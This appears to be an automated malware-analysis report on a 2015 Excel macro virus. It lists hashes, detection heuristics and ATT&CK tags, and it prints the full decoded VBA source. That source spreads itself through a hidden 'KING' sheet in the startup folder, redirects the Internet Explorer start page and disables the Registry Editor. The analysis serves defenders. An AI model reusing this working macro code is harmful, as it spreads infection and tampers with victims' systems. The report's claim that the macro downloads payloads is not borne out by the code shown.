Office (OLE) malware analysis — malicious · 6b7971deb24d5d20

MALICIOUS

Office (OLE)

235.0 KB Created: 2015-07-24 08:19:57 Authoring application: Microsoft Excel First seen: 2015-10-04

MD5: 740afb461608d04932e05878fbe000d0 SHA-1: 63df31fe6c60287d4d99b047bff77fbbcc91bce1 SHA-256: 6b7971deb24d5d20bebda4220d61041ada6d5ae0cf7a71c68ab3e08a53c25517

250 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

This Excel document contains VBA macros, including an auto_open subroutine, which is a common technique for executing malicious code upon opening. The macros utilize WScript.Shell to potentially download and execute further payloads, indicated by the 'SE_LOLBIN_RUN_COMMAND' heuristic firing. The presence of an embedded URL, though marked as benign, suggests an attempt to contact external resources.

Heuristics 8

VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
Set OperationRegistry = CreateObject("WScript.Shell")
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set OperationRegistry = CreateObject("WScript.Shell")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Sub auto_open()
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND

Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://3azu.taobao.com In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2481 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2481 bytes
SHA-256: `c15ded264c025a7906275aeecb99949bad710a41aba565ba43d04c321cc37541`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "KING" Sub auto_open() Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14" Application.OnSheetActivate = "ck_files" End Sub Sub ck_files() Attribute ck_files.VB_ProcData.VB_Invoke_Func = " \n14" c$ = Application.StartupPath m$ = Dir(c$ & "\" & "KING.XLS") 'results If m$ = "KING.XLS" Then p = 1 Else p = 0 If ActiveWorkbook.Modules.count > 0 Then w = 1 Else w = 0 whichfile = p + w * 10 Select Case whichfile Case 10 Application.ScreenUpdating = False n4$ = ActiveWorkbook.name Sheets("KING").Visible = True Sheets("KING").Select Sheets("KING").Copy With ActiveWorkbook .Title = "" .Subject = "" .Author = "" .Keywords = "" .Comments = "" End With newname$ = ActiveWorkbook.name c4$ = CurDir() ChDir Application.StartupPath ActiveWindow.Visible = False Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "KING.XLS", FileFormat:=xlNormal _ , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _ False, CreateBackup:=False ChDir c4$ Workbooks(n4$).Sheets("KING").Visible = False Application.OnSheetActivate = "" Application.ScreenUpdating = True Application.OnSheetActivate = "KING.XLS!ck_files" Case 1 Application.ScreenUpdating = False n4$ = ActiveWorkbook.name p4$ = ActiveWorkbook.Path s$ = Workbooks(n4$).Sheets(1).name If s$ <> "KING" Then Workbooks("KING.XLS").Sheets("KING").Copy before:=Workbooks(n4$).Sheets(1) Workbooks(n4$).Sheets("KING").Visible = False Else End If Application.OnSheetActivate = "" Application.ScreenUpdating = True Application.OnSheetActivate = "KING.XLS!ck_files" Case Else End Select Dim OperationRegistry On Error Resume Next Set OperationRegistry = CreateObject("WScript.Shell") MyUrl = "http://3azu.taobao.com" RegPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Start Page" OperationRegistry.RegWrite RegPath, MyUrl RegPath = "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page" OperationRegistry.RegWrite RegPath, MyUrl RegPath = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools" OperationRegistry.RegWrite RegPath, "1", "REG_DWORD" Exit Sub '正常运行的话会在这里退出程序 End Sub

SHA-256: c15ded264c025a7906275aeecb99949bad710a41aba565ba43d04c321cc37541

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "KING"




Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.OnSheetActivate = "ck_files"
End Sub

Sub ck_files()
Attribute ck_files.VB_ProcData.VB_Invoke_Func = " \n14"
    c$ = Application.StartupPath
    m$ = Dir(c$ & "\" & "KING.XLS") 'results
    If m$ = "KING.XLS" Then p = 1 Else p = 0
    If ActiveWorkbook.Modules.count > 0 Then w = 1 Else w = 0
    whichfile = p + w * 10
    
Select Case whichfile
    Case 10
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.name
    Sheets("KING").Visible = True
    Sheets("KING").Select
    Sheets("KING").Copy
    With ActiveWorkbook
        .Title = ""
        .Subject = ""
        .Author = ""
        .Keywords = ""
        .Comments = ""
    End With
    newname$ = ActiveWorkbook.name
    c4$ = CurDir()
    ChDir Application.StartupPath
    ActiveWindow.Visible = False
  Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "KING.XLS", FileFormat:=xlNormal _
        , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
        False, CreateBackup:=False
    ChDir c4$
    Workbooks(n4$).Sheets("KING").Visible = False
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "KING.XLS!ck_files"
    Case 1
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.name
    p4$ = ActiveWorkbook.Path
    s$ = Workbooks(n4$).Sheets(1).name
    If s$ <> "KING" Then
        Workbooks("KING.XLS").Sheets("KING").Copy before:=Workbooks(n4$).Sheets(1)
        Workbooks(n4$).Sheets("KING").Visible = False
    Else
    End If
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "KING.XLS!ck_files"
    Case Else
End Select
Dim OperationRegistry
On Error Resume Next

Set OperationRegistry = CreateObject("WScript.Shell")
MyUrl = "http://3azu.taobao.com"
RegPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Start Page"
OperationRegistry.RegWrite RegPath, MyUrl
RegPath = "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page"
OperationRegistry.RegWrite RegPath, MyUrl

RegPath = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
OperationRegistry.RegWrite RegPath, "1", "REG_DWORD"

Exit Sub   '正常运行的话会在这里退出程序

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.